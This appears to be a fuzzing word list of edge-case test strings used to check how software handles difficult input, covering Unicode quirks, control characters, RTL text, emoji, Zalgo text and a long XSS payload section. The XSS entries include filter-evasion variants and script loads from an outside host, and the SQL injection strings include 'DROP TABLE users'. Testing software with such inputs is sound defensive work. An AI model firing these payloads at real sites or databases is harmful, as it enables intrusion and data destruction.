|
||||
|
||||
,./;'[]\-=
|
||||
<>?:"{}|_+
|
||||
!@#$%^&*()`~
|
||||
|
||||
# Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F,
|
||||
# and U+007F (DEL)
|
||||
# Often forbidden to appear in various text-based file formats (e.g. XML),
|
||||
# or reused for internal delimiters on the theory that they should never
|
||||
# appear in input.
|
||||
# The next line may appear to be blank or mojibake in some viewers.
|
||||
|
||||
|
||||
# Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F.
|
||||
# Commonly misinterpreted as additional graphic characters.
|
||||
# The next line may appear to be blank, mojibake, or dingbats in some viewers.
|
||||
|
||||
|
||||
# Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode
|
||||
# version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL),
|
||||
# and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often
|
||||
# treated as whitespace in some contexts.
|
||||
# This file unfortunately cannot express strings containing
|
||||
# U+0000, U+000A, or U+000D (NUL, LF, CR).
|
||||
# The next line may appear to be blank or mojibake in some viewers.
|
||||
# The next line may be flagged for "trailing whitespace" in some viewers.
|
||||
|
||||
|
||||
# Unicode additional control characters: all of the characters with
|
||||
# general category Cf (in Unicode 8.0.0).
|
||||
# The next line may appear to be blank or mojibake in some viewers.
|
||||
|
||||
|
||||
# "Byte order marks", U+FEFF and U+FFFE, each on its own line.
|
||||
# The next two lines may appear to be blank or mojibake in some viewers.
|
||||
|
||||
|
||||
|
||||
# Unicode Symbols
|
||||
#
|
||||
# Strings which contain common unicode symbols (e.g. smart quotes)
|
||||
|
||||
Ω≈ç√∫˜µ≤≥÷
|
||||
åß∂ƒ©˙∆˚¬…æ
|
||||
œ∑´®†¥¨ˆøπ“‘
|
||||
¡™£¢∞§¶•ªº–≠
|
||||
¸˛Ç◊ı˜Â¯˘¿
|
||||
ÅÍÎÏ˝ÓÔÒÚÆ☃
|
||||
Œ„´‰ˇÁ¨ˆØ∏”’
|
||||
`⁄€‹›fifl‡°·‚—±
|
||||
⅛⅜⅝⅞
|
||||
ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
|
||||
٠١٢٣٤٥٦٧٨٩
|
||||
|
||||
# Unicode Subscript/Superscript/Accents
|
||||
#
|
||||
# Strings which contain unicode subscripts/superscripts; can cause rendering issues
|
||||
|
||||
⁰⁴⁵
|
||||
₀₁₂
|
||||
⁰⁴⁵₀₁₂
|
||||
ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็
|
||||
|
||||
# Quotation Marks
|
||||
#
|
||||
# Strings which contain misplaced quotation marks; can cause encoding errors
|
||||
|
||||
'
|
||||
"
|
||||
''
|
||||
""
|
||||
'"'
|
||||
"''''"'"
|
||||
"'"'"''''"
|
||||
<foo val=“bar” />
|
||||
<foo val=“bar” />
|
||||
<foo val=”bar“ />
|
||||
<foo val=`bar' />
|
||||
|
||||
# Two-Byte Characters
|
||||
#
|
||||
# Strings which contain two-byte characters: can cause rendering issues or character-length issues
|
||||
|
||||
田中さんにあげて下さい
|
||||
パーティーへ行かないか
|
||||
和製漢語
|
||||
部落格
|
||||
사회과학원 어학연구소
|
||||
찦차를 타고 온 펲시맨과 쑛다리 똠방각하
|
||||
社會科學院語學研究所
|
||||
울란바토르
|
||||
𠜎𠜱𠝹𠱓𠱸𠲖𠳏
|
||||
|
||||
# Changing length when lowercased
|
||||
#
|
||||
# Characters which increase in length (2 to 3 bytes) when lowercased
|
||||
# Credit: https://twitter.com/jifa/status/625776454479970304
|
||||
|
||||
Ⱥ
|
||||
Ⱦ
|
||||
|
||||
# Japanese Emoticons
|
||||
#
|
||||
# Strings which consists of Japanese-style emoticons which are popular on the web
|
||||
|
||||
ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ
|
||||
(。◕ ∀ ◕。)
|
||||
`ィ(´∀`∩
|
||||
__ロ(,_,*)
|
||||
・( ̄∀ ̄)・:*:
|
||||
゚・✿ヾ╲(。◕‿◕。)╱✿・゚
|
||||
,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’
|
||||
(╯°□°)╯︵ ┻━┻)
|
||||
(ノಥ益ಥ)ノ ┻━┻
|
||||
┬─┬ノ( º _ ºノ)
|
||||
( ͡° ͜ʖ ͡°)
|
||||
¯\_(ツ)_/¯
|
||||
|
||||
# Emoji
|
||||
#
|
||||
# Strings which contain Emoji; should be the same behavior as two-byte characters, but not always
|
||||
|
||||
😍
|
||||
👩🏽
|
||||
👾 🙇 💁 🙅 🙆 🙋 🙎 🙍
|
||||
🐵 🙈 🙉 🙊
|
||||
❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙
|
||||
✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿
|
||||
🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧
|
||||
0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟
|
||||
|
||||
# Regional Indicator Symbols
|
||||
#
|
||||
# Regional Indicator Symbols can be displayed differently across
|
||||
# fonts, and have a number of special behaviors
|
||||
|
||||
🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸
|
||||
🇺🇸🇷🇺🇸🇦🇫🇦🇲
|
||||
🇺🇸🇷🇺🇸🇦
|
||||
|
||||
# Unicode Numbers
|
||||
#
|
||||
# Strings which contain unicode numbers; if the code is localized, it should see the input as numeric
|
||||
|
||||
123
|
||||
١٢٣
|
||||
|
||||
# Right-To-Left Strings
|
||||
#
|
||||
# Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)
|
||||
|
||||
ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.
|
||||
בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ
|
||||
הָיְתָהtestالصفحات التّحول
|
||||
﷽
|
||||
ﷺ
|
||||
مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ،
|
||||
|
||||
# Trick Unicode
|
||||
#
|
||||
# Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)
|
||||
|
||||
test
|
||||
test
|
||||
test
|
||||
testtest
|
||||
test
|
||||
|
||||
# Zalgo Text
|
||||
#
|
||||
# Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)
|
||||
|
||||
Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣
|
||||
̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰
|
||||
̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟
|
||||
̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕
|
||||
Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
|
||||
|
||||
# Unicode Upsidedown
|
||||
#
|
||||
# Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com)
|
||||
|
||||
˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥
|
||||
00˙Ɩ$-
|
||||
|
||||
# Unicode font
|
||||
#
|
||||
# Strings which contain bold/italic/etc. versions of normal characters
|
||||
|
||||
The quick brown fox jumps over the lazy dog
|
||||
𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠
|
||||
𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌
|
||||
𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈
|
||||
𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰
|
||||
𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘
|
||||
𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐
|
||||
⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢
|
||||
|
||||
# Script Injection
|
||||
#
|
||||
# Strings which attempt to invoke a benign script injection; shows vulnerability to XSS
|
||||
|
||||
<script>alert(123)</script>
|
||||
<script>alert('123');</script>
|
||||
<img src=x onerror=alert(123) />
|
||||
<svg><script>123<1>alert(123)</script>
|
||||
"><script>alert(123)</script>
|
||||
'><script>alert(123)</script>
|
||||
><script>alert(123)</script>
|
||||
</script><script>alert(123)</script>
|
||||
< / script >< script >alert(123)< / script >
|
||||
onfocus=JaVaSCript:alert(123) autofocus
|
||||
" onfocus=JaVaSCript:alert(123) autofocus
|
||||
' onfocus=JaVaSCript:alert(123) autofocus
|
||||
<script>alert(123)</script>
|
||||
<sc<script>ript>alert(123)</sc</script>ript>
|
||||
--><script>alert(123)</script>
|
||||
";alert(123);t="
|
||||
';alert(123);t='
|
||||
JavaSCript:alert(123)
|
||||
;alert(123);
|
||||
src=JaVaSCript:prompt(132)
|
||||
"><script>alert(123);</script x="
|
||||
'><script>alert(123);</script x='
|
||||
><script>alert(123);</script x=
|
||||
" autofocus onkeyup="javascript:alert(123)
|
||||
' autofocus onkeyup='javascript:alert(123)
|
||||
<script\x20type="text/javascript">javascript:alert(1);</script>
|
||||
<script\x3Etype="text/javascript">javascript:alert(1);</script>
|
||||
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
|
||||
<script\x09type="text/javascript">javascript:alert(1);</script>
|
||||
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
|
||||
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
|
||||
<script\x0Atype="text/javascript">javascript:alert(1);</script>
|
||||
'`"><\x3Cscript>javascript:alert(1)</script>
|
||||
'`"><\x00script>javascript:alert(1)</script>
|
||||
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
|
||||
ABC<div style="x:expression\x00(javascript:alert(1)">DEF
|
||||
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\x09expression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\x20expression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\x00expression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
|
||||
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
|
||||
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
|
||||
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
|
||||
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
|
||||
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
|
||||
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
|
||||
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
|
||||
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
|
||||
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
|
||||
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
|
||||
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
|
||||
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
|
||||
"`'><script>\x3Bjavascript:alert(1)</script>
|
||||
"`'><script>\x0Djavascript:alert(1)</script>
|
||||
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
|
||||
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
|
||||
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
|
||||
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
|
||||
"`'><script>\x09javascript:alert(1)</script>
|
||||
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
|
||||
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
|
||||
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
|
||||
"`'><script>\x00javascript:alert(1)</script>
|
||||
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
|
||||
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
|
||||
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
|
||||
"`'><script>\x0Cjavascript:alert(1)</script>
|
||||
"`'><script>\x2Bjavascript:alert(1)</script>
|
||||
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
|
||||
"`'><script>-javascript:alert(1)</script>
|
||||
"`'><script>\x0Ajavascript:alert(1)</script>
|
||||
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
|
||||
"`'><script>\x7Ejavascript:alert(1)</script>
|
||||
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
|
||||
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
|
||||
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
|
||||
"`'><script>\xC2\x85javascript:alert(1)</script>
|
||||
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
|
||||
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
|
||||
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
|
||||
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
|
||||
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
|
||||
"`'><script>\x21javascript:alert(1)</script>
|
||||
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
|
||||
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
|
||||
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
|
||||
"`'><script>\x0Bjavascript:alert(1)</script>
|
||||
"`'><script>\x20javascript:alert(1)</script>
|
||||
"`'><script>\xC2\xA0javascript:alert(1)</script>
|
||||
<img \x00src=x onerror="alert(1)">
|
||||
<img \x47src=x onerror="javascript:alert(1)">
|
||||
<img \x11src=x onerror="javascript:alert(1)">
|
||||
<img \x12src=x onerror="javascript:alert(1)">
|
||||
<img\x47src=x onerror="javascript:alert(1)">
|
||||
<img\x10src=x onerror="javascript:alert(1)">
|
||||
<img\x13src=x onerror="javascript:alert(1)">
|
||||
<img\x32src=x onerror="javascript:alert(1)">
|
||||
<img\x47src=x onerror="javascript:alert(1)">
|
||||
<img\x11src=x onerror="javascript:alert(1)">
|
||||
<img \x47src=x onerror="javascript:alert(1)">
|
||||
<img \x34src=x onerror="javascript:alert(1)">
|
||||
<img \x39src=x onerror="javascript:alert(1)">
|
||||
<img \x00src=x onerror="javascript:alert(1)">
|
||||
<img src\x09=x onerror="javascript:alert(1)">
|
||||
<img src\x10=x onerror="javascript:alert(1)">
|
||||
<img src\x13=x onerror="javascript:alert(1)">
|
||||
<img src\x32=x onerror="javascript:alert(1)">
|
||||
<img src\x12=x onerror="javascript:alert(1)">
|
||||
<img src\x11=x onerror="javascript:alert(1)">
|
||||
<img src\x00=x onerror="javascript:alert(1)">
|
||||
<img src\x47=x onerror="javascript:alert(1)">
|
||||
<img src=x\x09onerror="javascript:alert(1)">
|
||||
<img src=x\x10onerror="javascript:alert(1)">
|
||||
<img src=x\x11onerror="javascript:alert(1)">
|
||||
<img src=x\x12onerror="javascript:alert(1)">
|
||||
<img src=x\x13onerror="javascript:alert(1)">
|
||||
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
|
||||
<img src=x onerror=\x09"javascript:alert(1)">
|
||||
<img src=x onerror=\x10"javascript:alert(1)">
|
||||
<img src=x onerror=\x11"javascript:alert(1)">
|
||||
<img src=x onerror=\x12"javascript:alert(1)">
|
||||
<img src=x onerror=\x32"javascript:alert(1)">
|
||||
<img src=x onerror=\x00"javascript:alert(1)">
|
||||
<a href=javascript:javascript:alert(1)>XXX</a>
|
||||
<img src="x` `<script>javascript:alert(1)</script>"` `>
|
||||
<img src onerror /" '"= alt=javascript:alert(1)//">
|
||||
<title onpropertychange=javascript:alert(1)></title><title title=>
|
||||
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
|
||||
<!--[if]><script>javascript:alert(1)</script -->
|
||||
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
|
||||
<script src="/\%(jscript)s"></script>
|
||||
<script src="\\%(jscript)s"></script>
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
<IMG SRC=# onmouseover="alert('xxs')">
|
||||
<IMG SRC= onmouseover="alert('xxs')">
|
||||
<IMG onmouseover="alert('xxs')">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
|
||||
<SCRIPT SRC=//ha.ckers.org/.j>
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<iframe src=http://ha.ckers.org/scriptlet.html <
|
||||
\";alert('XSS');//
|
||||
<u oncopy=alert()> Copy me</u>
|
||||
<i onwheel=alert(1)> Scroll over me </i>
|
||||
<plaintext>
|
||||
http://a/%%30%30
|
||||
</textarea><script>alert(123)</script>
|
||||
|
||||
# SQL Injection
|
||||
#
|
||||
# Strings which can cause a SQL injection if inputs are not sanitized
|
||||
|
||||
1;DROP TABLE users
|
||||
1'; DROP TABLE users-- 1
|
||||
' OR 1=1 -- 1
|
||||
' OR '1'='1
|
||||
|
||||
%
|
||||
_
|
||||
|
||||
# Server Code Injection
|
||||
#
|
||||
# Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)
|
||||
|
||||
-
|
||||
--
|
||||
--version
|
||||
--help
|
||||
$USER
|
||||
